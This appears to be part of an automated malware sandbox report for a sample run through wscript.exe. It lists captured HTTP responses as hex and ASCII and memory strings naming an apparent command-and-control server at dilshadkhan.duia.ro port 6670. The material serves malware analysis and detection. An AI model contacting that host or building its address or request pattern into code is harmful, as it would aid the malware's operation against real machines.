6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:43:00 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 252content-encoding: gzipvary: Accept-Encoding,User-Agent,User-Agentdate: Fri, 27 May 2022 16:43:24 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 252content-encoding: gzipvary: Accept-Encoding,User-Agent,User-Agentdate: Fri, 27 May 2022 16:43:24 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 584date: Fri, 27 May 2022 16:43:24 GMTserver: LiteSpeedvary: User-Agent,User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 38 73 2f 3f 34 68 4d 34 3d 6f 34 42 30 66 26 61 6d 70 3b 7a 56 42 3d 64 2f 6e 73 74 45 66 4a 6a 36 45 71 48 49 61 6f 36 33 46 4a 30 73 39 47 75 71 41 39 35 4b 51 48 6f 71 74 61 6b 74 6a 72 39 2f 70 32 6a 48 77 6c 6b 43 51 33 79 68 43 45 6f 31 53 55 72 53 51 6b 35 6e 5a 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6a 6c 62 77 61 74 65 72 64 61 6d 61 67 65 72 65 70 61 69 72 73 65 61 74 74 6c 65 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np8s/?4hM4=o4B0f&amp;zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl was not found on this server.<HR><I>www.jlbwaterdamagerepairseattle.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 27 May 2022 16:43:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:44:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSServer: cloudflareCF-RAY: 712036e27e819bb3-FRAData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:44:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 712036e25f3e6964-FRAContent-Encoding: gzipData Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef fe 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 84 4a 6d af b3 6f 76 67 56 df 15 af cb fa 7d 57 62 5d bf 54 d8 ed 9f ab cd 12 93 07 a2 4d 59 af 88 8a ba b8 4d 1e a7 33 a2 72 3b 31 4a 7b 39 37 46 7b b6 ce 28 2d 41 1a 36 8b d9 02 db 24 58 a5 2e 3a 4d 37 51 69 1a 21 7d 48 ae 1f 7c 73 f3 87 f1 73 a3 f4 c5 d4 9e 91 f9 b3 e3 56 d8 61 ff 56 e1 6a 5b c4 24 f8 18 38 a4 08 f1 a1 45 cb f9 8b f3 54 d3 65 b4 3d 39 17 24 a4 68 9b a6 bf 87 c5 bf 00 8a 73 4e 79 5c c4 f1 98 ba 28 9c d9 e1 ea 43 c3 90 dc 87 78 82 24 74 2d c3 46 94 03 5c a4 63 77 e6 28 83 ee 6d 74 03 f8 9b ec e7 2c 8d 45 34 8d 0f 50 df 00 00 00 ff ff 03 00 59 3c e4 fe 3b 01 00 00 0d 0a Data Ascii: f5Tn0D)e%A U[l)JmovgV}Wb]TMYM3r;1J{97F{(-A6$X.:M7Qi!}H|ssVaVj[$8ETe=9$hsNy\(Cx$t-F\cw(mt,E4PY<;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:45:04 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:45:06 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:45:08 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 252content-encoding: gzipvary: Accept-Encoding,User-Agent,User-Agentdate: Fri, 27 May 2022 16:45:15 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 252content-encoding: gzipvary: Accept-Encoding,User-Agent,User-Agentdate: Fri, 27 May 2022 16:45:15 GMTserver: LiteSpeedData Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00 Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmlcontent-length: 584date: Fri, 27 May 2022 16:45:15 GMTserver: LiteSpeedvary: User-Agent,User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 38 73 2f 3f 34 68 4d 34 3d 6f 34 42 30 66 26 61 6d 70 3b 7a 56 42 3d 64 2f 6e 73 74 45 66 4a 6a 36 45 71 48 49 61 6f 36 33 46 4a 30 73 39 47 75 71 41 39 35 4b 51 48 6f 71 74 61 6b 74 6a 72 39 2f 70 32 6a 48 77 6c 6b 43 51 33 79 68 43 45 6f 31 53 55 72 53 51 6b 35 6e 5a 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6a 6c 62 77 61 74 65 72 64 61 6d 61 67 65 72 65 70 61 69 72 73 65 61 74 74 6c 65 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np8s/?4hM4=o4B0f&amp;zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl was not found on this server.<HR><I>www.jlbwaterdamagerepairseattle.com</I></BODY></HTML>
Source: wscript.exe, 00000009.00000002.972899634.000002A0FE18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.964440619.000002A0FC389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 00000009.00000003.512513259.000002A0FE165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/KCQlm
Source: wscript.exe, 00000009.00000003.797460057.000002A0FE3A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798562853.000002A0FE392000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798358475.000002A0FE357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 00000009.00000002.973024572.000002A0FE375000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre$s
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre)
Source: wscript.exe, 00000009.00000002.955051076.000002A0FC2F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre)1
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((m
Source: wscript.exe, 00000002.00000003.896087228.0000015597A8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703640260.0000015597A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0
Source: wscript.exe, 00000002.00000003.896380234.0000015597A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.961961202.0000015597A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703640260.0000015597A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0D
Source: wscript.exe, 00000005.00000003.755909949.000002CA03738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1
